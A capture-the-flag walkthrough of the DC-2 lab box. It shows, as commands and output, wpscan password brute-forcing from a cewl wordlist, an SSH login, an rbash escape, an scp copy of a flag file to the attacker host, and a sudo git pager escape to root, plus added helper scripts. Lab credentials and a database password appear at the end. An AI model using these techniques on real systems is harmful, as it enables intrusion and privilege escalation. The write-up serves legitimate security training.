DC-2 box walkthrough
1. Attack process
Host discovery:
nmap -sP 192.168.0.1/24
(-sP is the old spelling of -sn, a ping sweep.) It found the DC-2 IP address:
192.168.0.131
The web server redirects to http://dc-2/ (the nmap http-title below shows it), so the hostname has to resolve before the site can be browsed. Add it to /etc/hosts:
echo "192.168.0.131 dc-2" >> /etc/hosts
Then ping dc-2; a reply means the entry works.
Next, port discovery (SYN scan, all ports, version/OS detection, output saved to a file):
nmap -sS -A -p- -oN /tmp/DC-2.txt 192.168.0.131
- Result:
# Nmap 7.70 scan initiated Mon Apr 27 14:28:47 2020 as: nmap -sS -A -p- -oN /tmp/DC-2.txt 192.168.0.131
Nmap scan report for 192.168.0.131
Host is up (0.00033s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:F6:92:EE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.33 ms 192.168.0.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 27 14:29:04 2020 -- 1 IP address (1 host up) scanned in 17.46 seconds
Only two ports are open: 7744 (ssh) and 80 (http).
Start with HTTP.
The site is a WordPress install, and there is a page holding a flag:
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
- The hint says to be "cewl", i.e. use cewl, which spiders the site and turns the words on its pages into a wordlist:
cewl -w /tmp/passwd.lst http://dc-2
That list is then used for the password attack.
WordPress also leaks usernames (author pages, the REST API, login error messages), so wpscan is used to enumerate them first.
# enumerate users first (the site only serves plain HTTP on port 80)
wpscan --url http://dc-2/ --enumerate u
Usernames found:
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
Usernames: admin, jerry, tom
Now brute-force their passwords (the wordlist is the one cewl just generated):
wpscan --url http://dc-2 --usernames admin,jerry,tom --passwords /tmp/passwd.lst
Two passwords came out (wpscan tries them through xmlrpc.php, which is why the attack is fast):
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
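To make the cewl step concrete, here is an added example (my own code, not part of the original write-up or of cewl itself) that does offline what cewl does online: it strips the HTML of a page, splits the text into words, drops words shorter than a minimum length and keeps each word once, in first-seen order. The page it chews on is a constructed stand-in for http://dc-2/ with the same kind of Latin filler text WordPress ships; the two passwords the write-up recovered are ordinary words in such text, which is exactly why a site-specific wordlist beat rockyou here.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up, not cewl's code): a
# minimal cewl-style wordlist builder run offline on a constructed page.

# Constructed sample page standing in for a fetched http://dc-2/ page.
SAMPLE_HTML='<html><head><title>DC-2 &ndash; Just another WordPress site</title></head>
<body><h1>Welcome to DC-2</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam parturient
montes, nascetur ridiculus mus. Go to the <a href="/index.php/flag/">flag</a> page.</p>
<script>var tracker = "script_only_junk";</script>
</body></html>'

# cewl_like [MIN_LEN]   (HTML on stdin)
# Emits unique words of at least MIN_LEN characters, first-seen order,
# like `cewl -m MIN_LEN`. Case is kept, as cewl does by default.
cewl_like() {
    local min_len="${1:-3}"
    # 1) drop single-line <script> blocks (their text is not page content)
    # 2) replace remaining tags with a space   3) drop HTML entities
    sed -e 's#<script[^>]*>[^<]*</script>##g' -e 's/<[^>]*>/ /g' -e 's/&[A-Za-z0-9#]*;/ /g' |
        tr -cs '[:alnum:]' '\n' |
        awk -v n="$min_len" 'length($0) >= n && !seen[$0]++'
}

# Online variant for a single page (assumes curl is installed). cewl also
# follows links to a depth of 2; this one does not spider.
cewl_like_url() {
    curl -s "$1" | cewl_like "${2:-3}"
}

# Stand-alone demo: build the list from the constructed page.
printf '%s\n' "$SAMPLE_HTML" | cewl_like 3
```

The generated list contains adipiscing and parturient, two-letter tokens such as "to" are gone, and the script body never makes it in. Raising the minimum length (cewl's -m) shrinks the list to the long words; with WordPress-style content that is where the odd Latin passwords tend to sit.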
Now to log into the dashboard and try for a shell. Anyone who has touched WordPress knows the admin login lives at
http://dc-2/wp-admin/
and if you did not know, a directory brute-force finds it quickly.
Logged in with one of the two accounts and found flag 2 under Pages:
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
Looked around the dashboard and also hammered at it with msf (Metasploit) for a while,
still no shell (the theme/plugin editors and upload paths were not cooperating).
Another way in, then?
That leaves SSH.
The scan showed SSH on port 7744,
so try the two website passwords there:
ssh jerry@dc-2 -p 7744
The login is refused: jerry's WordPress password is not his SSH password.
Try tom:
ssh tom@dc-2 -p 7744
This one gets in.
But:
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$
tom@DC-2:~$
tom@DC-2:~$ id
-rbash: id: command not found
tom@DC-2:~$
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat
-rbash: cat: command not found
tom@DC-2:~$ sudo
-rbash: sudo: command not found
Even cat is unavailable; the "-rbash:" prefix shows the login shell is a restricted bash and only what is in its PATH can run.
The only immediate option is to pull the file over to the Kali box.
Check whether scp is available: it is.
scp flag3.txt root@192.168.0.21:/tmp
- Enter the Kali root password at the prompt and the file copies over.
root@kali:/tmp# cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Most commands are blocked, and the shell is rbash.
echo $SHELL
shows the current shell (echo is a builtin, which is why it still works). rbash forbids changing PATH, so the first move is to get a shell that is not restricted:
BASH_CMDS[a]=/bin/sh;a   # found this trick online; it registers /bin/sh under the name "a" and runs it, and the child sh is not restricted
# still "command not found" after switching? the PATH is inherited, so check it
echo $PATH
/home/tom/usr/bin
export PATH=$PATH:/bin:/usr/bin
# set PATH ourselves; this is allowed now that the shell is no longer rbash
su jerry   # switch to jerry, as flag 3 hinted
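The rbash escape above works because the restriction applies only to the shell that was started as rbash, not to anything it spawns. As an added example (my own code, not from the write-up), the script below reproduces tom's situation locally with `bash -r` (which is what rbash is), shows which operations restricted bash refuses, and then shows that a child shell launched from inside it can set PATH freely. It assumes bash and sh are on the local PATH; the /home/tom/usr/bin value is only copied from the write-up for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): probe restricted bash
# locally and demonstrate the "spawn an unrestricted child, then fix PATH"
# escape used against tom's rbash on DC-2.

# rbash_allows 'CMD' -> 0 if restricted bash runs CMD without complaint.
# Blocked operations produce "restricted" or "readonly variable" errors.
rbash_allows() {
    local out
    out=$(bash -r -c "$1" 2>&1 || true)
    ! printf '%s\n' "$out" | grep -Eq 'restricted|readonly variable'
}

# What tom ran into: PATH is read-only under rbash, commands cannot be
# named by absolute path (so /bin/cat is unreachable even though it
# exists), cd and output redirection are refused as well.
rbash_probe_report() {
    local probe
    for probe in 'echo hello' 'cd /' 'export PATH=$PATH:/bin' '/bin/ls /' 'echo x > /dev/null'; do
        if rbash_allows "$probe"; then
            printf 'allowed : %s\n' "$probe"
        else
            printf 'blocked : %s\n' "$probe"
        fi
    done
}

# escape_and_fix_path -> the PATH seen by a child shell that was launched
# from inside rbash and then exported a new value. The child is a plain
# bash, so the assignment succeeds. On DC-2 the write-up spawned the child
# with BASH_CMDS[a]=/bin/sh;a; newer bash releases refuse that particular
# assignment in restricted mode, but any unrestricted child shell (here a
# plain `bash` found on PATH) serves the same purpose.
escape_and_fix_path() {
    bash -r -c 'bash -c "export PATH=/home/tom/usr/bin:/bin:/usr/bin; cd / && echo \$PATH"' 2>/dev/null
}

# Stand-alone demo
rbash_probe_report
echo "child shell PATH: $(escape_and_fix_path)"
```

Note the order of operations: exporting PATH from inside rbash fails outright, so the new shell has to come first and PATH second, which is the sequence the write-up ended up using. If the permitted directory happens to contain a pager or editor, those give a shell too (`!bash` in less, `:!bash` in vi) and no BASH_CMDS trick is needed.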
That works, and flag 4 is in jerry's home directory.
Flag 4 reads:
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
The "git" in "git outta here" is the hint.
Still, check the usual things first:
history, sudo -l, ...
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
So jerry can run git as root without a password.
I am not very familiar with git.
A search turned up a post calling this a "buffer vulnerability", but it is nothing of the sort: git -p forces its output through the pager (less by default), and less lets you run a shell command from its prompt with "!". Because sudo runs git as root, the bash spawned from that prompt is root too.
Also note the secure_path in the Defaults above: sudo resets PATH for the root command, so the PATH games from tom's shell do not carry over; the shell has to come out of git itself.
jerry@DC-2:~$ sudo git -p config
usage: git config [options]
Config file location
--global use global config file
--system use system config file
--local use repository config file
-f, --file <file> use given config file
--blob <blob-id> read config from given blob object
Action
--get get value: name [value-regex]
--get-all get all values: key [value-regex]
--get-regexp get values for regexp: name-regex [value-regex]
--get-urlmatch get value specific for the URL: section[.var] URL
--replace-all replace all matching variables: name value [value_regex]
--add add a new variable: name value
--unset remove a variable: name [value-regex]
--unset-all remove all matches: name [value-regex]
--rename-section rename section: old-name new-name
--remove-section remove a section: name
-l, --list list all
-e, --edit open an editor
--get-color <slot> find the color configured: [default]
--get-colorbool <slot>
find the color setting: [stdout-is-tty]
!bash
root@DC-2:/home/jerry# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:/home/jerry#
Remember that less only takes over when the output is longer than the screen, so shrink the terminal window first (or pick a command that prints more than a screenful, e.g. sudo git -p help config, then type !bash at the prompt).
That gives root.
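The step that made this box fall was reading `sudo -l` properly. As an added example (my own code, not from the write-up), here is a small parser for `sudo -l` output that extracts every command runnable as root with NOPASSWD, recovers secure_path (to show why PATH hijacks are off the table), and flags binaries that open a pager or editor, since those hand out a shell via `!bash` or `:!bash`. The first rule in the sample is the real jerry output from this write-up; the second rule line is constructed to exercise comma-separated commands with arguments and the (ALL) form. The escape commands printed for git and less are the documented GTFOBins-style invocations.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): parse `sudo -l`, list the
# passwordless root commands and flag pager/editor shell escapes.

# Sample output. First rule copied from the DC-2 jerry session; the
# second rule is constructed for illustration.
SUDO_L_SAMPLE='Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (ALL) NOPASSWD: /usr/bin/less /var/log/syslog, /bin/cat /var/log/auth.log'

# nopasswd_root_cmds  (sudo -l output on stdin)
# One "binary [args]" per line for every (root)/(ALL) NOPASSWD rule,
# splitting comma-separated command lists.
nopasswd_root_cmds() {
    awk '
        /may run the following commands on/ { rules = 1; next }
        rules && /^[ \t]*\((root|ALL)[^)]*\)[ \t]*.*NOPASSWD:/ {
            sub(/^.*NOPASSWD:[ \t]*/, "")
            n = split($0, c, /,[ \t]*/)
            for (i = 1; i <= n; i++) print c[i]
        }'
}

# sudo_secure_path  (sudo -l output on stdin)
# The secure_path value with the "\:" escapes removed. With secure_path
# set, sudo replaces PATH for the root command, so a directory the user
# controls is never searched: the escape must come from the binary itself.
sudo_secure_path() {
    grep -o 'secure_path=[^, ]*' | sed -e 's/^secure_path=//' -e 's/\\:/:/g' | head -n 1
}

# shell_escape_hint 'CMDLINE' -> prints how to get a shell from it, or
# returns 1 if the binary is not a known pager/editor.
shell_escape_hint() {
    local bin
    bin=$(basename "${1%% *}")
    case "$bin" in
        git)        echo "sudo git -p help config   # output goes to less; type !bash" ;;
        less|more|man) echo "sudo $1   # at the pager prompt type !bash" ;;
        vi|vim)     echo "sudo $1   # then :!bash (or :set shell=/bin/bash, :shell)" ;;
        *)          return 1 ;;
    esac
}

# report  (sudo -l output on stdin): one line per rule with the verdict.
report() {
    local cmd hint
    while IFS= read -r cmd; do
        if hint=$(shell_escape_hint "$cmd"); then
            printf 'SHELL   %-40s %s\n' "$cmd" "$hint"
        else
            printf 'look    %-40s (no direct pager/editor escape; check GTFOBins)\n' "$cmd"
        fi
    done < <(nopasswd_root_cmds)
}

# Stand-alone demo
printf '%s\n' "$SUDO_L_SAMPLE" | report
echo "root PATH will be: $(printf '%s\n' "$SUDO_L_SAMPLE" | sudo_secure_path)"
```

Running it on the DC-2 output flags /usr/bin/git with the same pager escape used above. The constructed cat rule is reported as "look": reading files as root is still valuable (shadow, SSH keys), but it is not a shell on its own.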
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a twet via @DCAU7.
!!!THE_ENT!!!
2. Key information
# 1. Website dashboard credentials
user1: tom
password: parturient
user2: jerry
password: adipiscing
# Found later in wp-config.php under the web root (the define() lines are WordPress's database settings)
define('DB_NAME', 'wordpressdb');
/** MySQL database username */
define('DB_USER', 'wpadmin');
/** MySQL database password */
define('DB_PASSWORD', '4uTiLL');